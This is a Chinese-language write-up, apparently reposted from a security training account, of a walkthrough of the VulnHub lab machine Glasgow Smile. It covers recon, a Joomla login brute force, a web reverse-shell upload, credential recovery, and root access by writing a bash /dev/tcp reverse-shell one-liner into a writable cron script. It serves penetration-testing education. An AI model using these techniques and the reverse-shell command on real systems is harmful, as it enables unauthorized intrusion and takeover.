Glasgow Smile系列:1

admin 2024年10月9日12:58:34评论315 views字数 2358阅读7分51秒阅读模式

获网安教程

免费&进群

Glasgow Smile系列:1  
Glasgow Smile系列:1

本文由掌控安全学院-清欢投稿

靶机描述

靶机地址:https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip

Description

Title: Glasgow Smile

  • Users: 5

  • Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)

  • Hint: Enumeration is the key.

If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Glasgow Smile is supposed to be a kind of gym for OSCP machines.
The machine is designed to be as real-life as possible. Anyway, You will find also a bunch of ctf style challanges, it’s important to have some encryption knowledge.
You need to have enough information about Linux enumeration and encryption for privileges escalation.

ABOUT THE VM:

Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically

CONTACT:

You can contact me on Hack the box (https://www.hackthebox.eu/profile/232477) or by email ([email protected]) for hints!

Changelog 2020-06-16 - v1.1 2020-06-15 - v1.0

信息收集

利用arp-scan -l命令扫描靶机IP

  1. arp-scan -l

Glasgow Smile系列:1
使用nmap扫描开放端口

  1. nmap -sV -p-192.168.75.172

Glasgow Smile系列:1
访问80端口并进行目录爆破

Glasgow Smile系列:1

  1. dirsearch -u http://192.168.75.172/

Glasgow Smile系列:1

密码爆破

joomla/administrator是一个后台登陆页面

Glasgow Smile系列:1

  1. 命令:cewl http://192.168.75.172/joomla -m 5 -d 1 -w joomla.txt

  2. -w 写入当前目录的文件中

  3. -d 表示爬取深度,默认是2

  4. -m 表示最小字符长度

Glasgow Smile系列:1
生成字典后对joomla登录页面进行爆破

Glasgow Smile系列:1

Glasgow Smile系列:1

漏洞利用

找到Extensions->Templates->Templates->Beez3 Details and Files上传反弹shell

Glasgow Smile系列:1

Glasgow Smile系列:1

反弹shell

Glasgow Smile系列:1

Glasgow Smile系列:1
获得交互式shell

  1. python -c 'import pty; pty.spawn("/bin/bash")'

Glasgow Smile系列:1
进入到/var/www发现有一个joomla2的目录

Glasgow Smile系列:1
查看配置文件发现数据库的账号和密码

Glasgow Smile系列:1

连接数据库

Glasgow Smile系列:1

Glasgow Smile系列:1

Glasgow Smile系列:1
rob为此虚拟机的一个用户,将rob的密码进行base64解密

Glasgow Smile系列:1

Glasgow Smile系列:1

  1. ???AllIHaveAreNegativeThoughts???

rob连接ssh

使用rob的密码进行ssh登录

Glasgow Smile系列:1
发现一个加密文件

Glasgow Smile系列:1

  1. Abnerineedyourhelp文件名断句分析,Abner I need your help像是一封求助信,打开后看到经过了某种编码加密,从一封信的角度来看,对内容做隐藏让我想到ROT13

  2. Howtoberoot听名字就知道,这应该是提升权限的一个关键点,上面第一个文件应该给到了提示

解密

在线解密工具:https://gchq.github.io/CyberChef/

Glasgow Smile系列:1

Glasgow Smile系列:1

  1. abner:I33hope99my0death000makes44more8cents00than0my0life0

abner连接ssh

Glasgow Smile系列:1
现在查看一下三个账户剩下的最后一个账户penguin,查找一下有关penguin的信息

  1. find /-iname *penguin*2>/dev/null//找属于penguin的文件

Glasgow Smile系列:1
切换到该目录进行查看

Glasgow Smile系列:1
将该文件移动到abner用户的主目录下进行解压,否则没有权限

  1. cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~

  2. //~表示$HOME即用户根目录

查看解压出来的文件,尝试一下最后的密码是不是penguins的密码

Glasgow Smile系列:1

  1. scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

Glasgow Smile系列:1

提权

利用文件权限配置不当进行提权
当某个进程启动权限为root,对应文件编辑权限为普通用户时,我们可以利用该问题点进行提权

Glasgow Smile系列:1

pspy64

https://github.com/DominicBreuker/pspy

Glasgow Smile系列:1

  1. chmod + pspy64

  2. ./pspy64

发现隐藏文件.trash_ol一分钟执行一次,前面发现这个.trash_old是可以编辑的,那就用他来反弹shell

Glasgow Smile系列:1

  1. bash -c 'bash -i >& /dev/tcp/192.168.75.150/7777 0>&1'

Glasgow Smile系列:1
一分钟后,计划任务程序会自动运行.trash_old,最终获取root权限

Glasgow Smile系列:1

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

Glasgow Smile系列:1

原文始发于微信公众号(掌控安全EDU):Glasgow Smile系列:1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月9日12:58:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Glasgow Smile系列:1https://cn-sec.com/archives/1928357.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息